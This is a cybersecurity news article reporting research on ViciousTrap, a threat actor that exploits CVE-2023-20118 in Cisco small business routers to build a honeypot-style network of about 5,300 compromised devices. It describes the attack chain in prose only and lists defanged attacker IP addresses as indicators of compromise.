ViciousTrap Exploits Cisco Vulnerability to Establish Global Honeypot Network Comprised of 5,300 Compromised Devices

Cybersecurity researchers have revealed that a threat actor, identified as ViciousTrap, has successfully compromised approximately 5,300 unique network edge devices across 84 countries, transforming them into a honeypot-like network.

The primary method of exploitation involves a critical security vulnerability impacting several models of Cisco Small Business routers, specifically the RV016, RV042, RV042G, RV082, RV320, and RV325 (CVE-2023-20118). Notably, the majority of these infected devices are based in Macau, totaling around 850 devices.

The infection mechanism utilizes a shell script known as NetGhost, which redirects incoming traffic from specific ports of the compromised routers to infrastructure controlled by the attacker, enabling the interception of network traffic, as detailed by Sekoia in a comprehensive analysis.

It is important to note that CVE-2023-20118 had previously been exploited by another botnet referred to as PolarEdge. Although there is no establishing connection between ViciousTrap and PolarEdge, it is believed that ViciousTrap is establishing honeypot infrastructure by compromising a diverse range of internet-facing devices, such as SOHO routers, SSL VPNs, DVRs, and BMC controllers, from over 50 brands including Araknis Networks, ASUS, D-Link, Linksys, and QNAP.

The exploitation chain involves the weaponization of CVE-2023-20118 to download and execute a bash script via ftpget, which subsequently contacts an external server to retrieve the wget binary. This binary is then used to exploit the Cisco vulnerability once more to execute a second script obtained through the previously dropped wget.

The second-stage shell script, dubbed NetGhost, is designed to redirect the network traffic from the compromised systems to third-party infrastructure controlled by the attacker, facilitating adversary-in-the-middle (AitM) attacks. Additionally, NetGhost has self-deletion capabilities to obscure its presence on the compromised host.

All exploitation attempts have traced back to a single IP address (101.99.91[.]151), with documented activity beginning as early as March 2025. Within a month, ViciousTrap actors have appropriated an undocumented web shell previously utilized in PolarEdge operations for their activities.

Recent exploitation attempts have also targeted ASUS routers, originating from a different IP address (101.99.91[.]239). However, in these cases, the threat actors have not established honeypot infrastructure on the compromised devices. All active IP addresses in this campaign have been situated in Malaysia, corresponding to an Autonomous System (AS45839) managed by hosting provider Shinjiru.

The threat actor is suspected to be of Chinese-speaking origin, indicated by some overlapping characteristics with the GobRAT infrastructure, as well as the redirection of traffic to several assets in Taiwan and the United States.

The ultimate objective of ViciousTrap remains ambiguous, although it is assessed with a high degree of confidence that the operation is indeed aimed at establishing a honeypot-style network.